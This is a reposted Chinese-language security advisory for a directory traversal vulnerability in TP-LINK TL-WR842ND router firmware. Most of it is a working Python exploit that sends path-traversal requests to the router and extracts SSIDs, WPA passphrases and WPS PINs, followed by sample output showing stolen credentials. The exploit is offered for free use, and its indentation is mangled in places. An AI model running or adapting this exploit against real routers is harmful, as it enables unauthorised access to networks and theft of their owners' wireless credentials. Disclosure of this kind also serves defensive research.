WR842ND目录遍历漏洞

发布日期:2013-05-29
更新日期:2013-05-30

受影响系统:
TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632
 TP-LINK TL-WR842ND
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60206
 
TP-LINK TL-WR842ND是无线宽带路由器产品。

TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632n及其他版本存在目录遍历漏洞,远程攻击者可利用此漏洞获取敏感信息。
 
<*来源:Adam Simuntis
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python

'''
 TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
 Adam Simuntis ::

If remote management is on you have full access to router configuration - if not and you're connected
 to router network you can discover another configured SSID's.


 Successfully tested against TP-LINK WR842ND
 Firmware Version:  3.12.22 Build 120424 Rel.39632n

Feel free to use, modify and distribute.

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
 `--> python2 e.py ip:port
 TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
 Adam Simuntis ::

:: Crafting and sending evil request..

-> ssid="some_network"
    !wps_default_pin=01010101
    !wpa_passphrase="secretpsk"


 :: Search for another networks? (y/n)
 > y

:: Searching..

:: Jumping for SSID 1..

-> ssid="another_network"
    !wps_default_pin=01010101
    !wpa_passphrase="another_secretpsk"

:: Jumping for SSID 2..


 :: Jumping for SSID 3..


 :: Jumping for SSID 4..

.-(~)---------------------------------------------------------------------------------(adam@ninja)-
 `-->

'''

import requests,sys,socket
 from time import sleep

data=''
 data2=''
 url=''

W  = '\033[0m'
R  = '\033[31m'
 B  = '\033[34m'

#KISS
 def parse_data(text):
    words = text.split()

for word in words :
        if 'ssid' in word and 'ignore' not in word :
            print W+"-> "+B+"%s" %(word)
                if 'pass' in word :
                        print W+"  !"+R+"%s" %(word)
        if 'default_pin' in word :
            print W+"  !"+R+"%s" %(word)
    print W

def make_url(host,n):
      junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
      return junk

if len(sys.argv) == 1 :
    print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
    sys.exit()

url = make_url(sys.argv[1],0)

if ':' in sys.argv[1] :
    host = sys.argv[1].split(":")
 else :
    host = sys.argv[1]

headers={
 "Host" : host[0],
 "User-Agent" : "Mozzila/5.0",
 "Referer" : "http://"+host[0]+"/" 
 }

print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
 print "Adam Simuntis :: \n"

try:
    print R+":: Crafting and sending evil request.."
    print W
    data = requests.get(url,headers=headers).content

except requests.ConnectionError, e:
    print R+":! Connection error!\n"
    sys.exit()

if data :
    parse_data(data)
 else :
    print B+":! Ups.. seems to be not vulnerable"
    print W

print "\n:: Search for another networks? (y/n)"
 answer = raw_input("> ")

if answer=="y" or answer=="Y" :
    print R+"\n:: Searching.."
    print W

for i in range(1,5) :

print W+":: Jumping for SSID %s..\n" %(i)

sleep(3)
         
        url = make_url(sys.argv[1],i)
        data2 = requests.get(url,headers=headers).content

if data2 :
            parse_data(data2)
        else :
            print B+"-> Nothing..\n"
             
else :
    print W+"\n:: Bye!"
         
print

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pszxx.html